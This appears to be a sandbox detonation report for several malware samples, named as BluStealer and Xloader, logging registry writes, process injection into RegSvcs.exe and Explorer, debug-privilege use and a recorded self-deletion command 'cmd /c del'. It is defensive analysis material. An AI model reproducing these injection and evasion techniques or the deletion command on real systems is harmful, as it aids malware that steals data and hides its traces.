| Set value (data) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\TV_FolderType = "{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}" | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f4225481e03947bc34db131e946b44c8dd50000 | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\TV_TopViewID = "{82BA0782-5B7A-4569-B5D7-EC83085F08CC}" | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\TV_TopViewVersion = "0" | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe
"C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe"
Network
Files
memory/764-0-0x0000000005290000-0x0000000005292000-memory.dmp
Analysis: behavioral16
Detonation Overview
Submitted
2024-11-21 20:43
Reported
2024-11-21 20:46
Platform
win10v2004-20241007-en
Max time kernel
93s
Max time network
139s
Command Line
Signatures
BluStealer
Blustealer family
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4192 set thread context of 3152 | N/A | C:\Users\Admin\AppData\Local\Temp\3f46e10e5fe376b995e2947d1be21955aa8341f39d80cca737109fcf2cf2bf3b.exe | C:\Users\Admin\AppData\Local\Temp\3f46e10e5fe376b995e2947d1be21955aa8341f39d80cca737109fcf2cf2bf3b.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\3f46e10e5fe376b995e2947d1be21955aa8341f39d80cca737109fcf2cf2bf3b.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\3f46e10e5fe376b995e2947d1be21955aa8341f39d80cca737109fcf2cf2bf3b.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\3f46e10e5fe376b995e2947d1be21955aa8341f39d80cca737109fcf2cf2bf3b.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\3f46e10e5fe376b995e2947d1be21955aa8341f39d80cca737109fcf2cf2bf3b.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\3f46e10e5fe376b995e2947d1be21955aa8341f39d80cca737109fcf2cf2bf3b.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\3f46e10e5fe376b995e2947d1be21955aa8341f39d80cca737109fcf2cf2bf3b.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\3f46e10e5fe376b995e2947d1be21955aa8341f39d80cca737109fcf2cf2bf3b.exe
"C:\Users\Admin\AppData\Local\Temp\3f46e10e5fe376b995e2947d1be21955aa8341f39d80cca737109fcf2cf2bf3b.exe"
C:\Users\Admin\AppData\Local\Temp\3f46e10e5fe376b995e2947d1be21955aa8341f39d80cca737109fcf2cf2bf3b.exe
"C:\Users\Admin\AppData\Local\Temp\3f46e10e5fe376b995e2947d1be21955aa8341f39d80cca737109fcf2cf2bf3b.exe"
C:\Users\Admin\AppData\Local\Temp\3f46e10e5fe376b995e2947d1be21955aa8341f39d80cca737109fcf2cf2bf3b.exe
"C:\Users\Admin\AppData\Local\Temp\3f46e10e5fe376b995e2947d1be21955aa8341f39d80cca737109fcf2cf2bf3b.exe"
Network
Files
Analysis: behavioral31
Detonation Overview
Submitted
2024-11-21 20:43
Reported
2024-11-21 20:46
Platform
win10v2004-20241007-en
Max time kernel
149s
Max time network
150s
Command Line
Signatures
Xloader
Xloader family
Xloader payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3224 set thread context of 1932 | N/A | C:\Users\Admin\AppData\Local\Temp\USD $.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
| PID 1932 set thread context of 3488 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | C:\Windows\Explorer.EXE |
| PID 1932 set thread context of 3488 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | C:\Windows\Explorer.EXE |
| PID 4936 set thread context of 3488 | N/A | C:\Windows\SysWOW64\cmmon32.exe | C:\Windows\Explorer.EXE |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\USD $.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmmon32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmmon32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmmon32.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\USD $.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\cmmon32.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\USD $.exe
"C:\Users\Admin\AppData\Local\Temp\USD $.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"{path}"
C:\Windows\SysWOW64\autofmt.exe
"C:\Windows\SysWOW64\autofmt.exe"
C:\Windows\SysWOW64\autofmt.exe
"C:\Windows\SysWOW64\autofmt.exe"
C:\Windows\SysWOW64\cmmon32.exe
"C:\Windows\SysWOW64\cmmon32.exe"
C:\Windows\SysWOW64\cmd.exe
/c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Network
Files